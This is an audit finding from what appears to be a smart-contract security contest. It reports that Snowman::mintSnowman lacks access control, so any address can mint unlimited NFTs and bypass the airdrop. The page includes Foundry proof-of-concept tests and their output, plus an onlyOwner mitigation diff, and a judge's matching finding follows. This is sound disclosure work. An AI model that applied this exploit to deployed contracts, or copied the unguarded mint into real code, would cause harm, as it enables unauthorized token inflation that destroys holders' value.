Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Missing access control on Snowman::mintSnowman lets any address mint unlimited NFTs, bypassing the airdrop

Root + Impact

Description

  • Snowman NFTs are intended to be minted only through the airdrop's stake-and-claim flow: SnowmanAirdrop::claimSnowman verifies the Merkle proof and signature and pulls the recipient's Snow before calling mintSnowman (SnowmanAirdrop.sol:98).

Snowman::mintSnowman is external with no access-control modifier and no caller check, so any address can call it directly and mint arbitrary NFTs to any recipient — with no Snow held, no stake, no proof, and no signature.

// src/Snowman.sol
function mintSnowman(address receiver, uint256 amount) external {
@> // NO access control — any caller reaches this
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
@> // NO bound on amount, NO check on msg.sender
}

Risk

Likelihood:

  • The function is publicly callable with no modifier; it is exploitable the moment the contract address is known, requiring only gas.

  • No preconditions and no privileged role — a fresh EOA with zero Snow qualifies.

Impact:

  • Unbounded, unauthorized NFT supply: the entire airdrop distribution model is bypassed and NFT scarcity is destroyed.

  • Legitimate recipients' NFTs are rendered worthless; the stake-for-NFT invariant (an NFT implies staked Snow) no longer holds.

Proof of Concept

An unprivileged EOA holding zero Snow mints 100 NFTs to itself:

function testPoC_UnrestrictedMint() public {
address attacker = makeAddr("attacker");
assertEq(snow.balanceOf(attacker), 0); // no eligibility
assertEq(nft.getTokenCounter(), 0); // nothing minted in setUp
vm.prank(attacker);
nft.mintSnowman(attacker, 100); // caller is a random EOA
assertEq(nft.balanceOf(attacker), 100);
assertEq(nft.getTokenCounter(), 100);
}

The call does not revert; balanceOf(attacker) → 100, getTokenCounter() → 100, 100 SnowmanMinted events (tokenIds 0–99) from a caller with no role and no Snow.


Recommended Mitigation

The root cause is an unguarded external mint. Gating it ensures NFTs can only originate from the intended stake-and-claim path. onlyOwner is the minimal fix, but it is correct only if Snowman ownership is held by the SnowmanAirdrop contract (so the airdrop's call at SnowmanAirdrop.sol:98 passes the check). If the deployer retains ownership, onlyOwner would break legitimate claims — in that case bind to the airdrop instead (store its address and require(msg.sender == airdrop)).

- function mintSnowman(address receiver, uint256 amount) external {
+ function mintSnowman(address receiver, uint256 amount) external onlyOwner {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!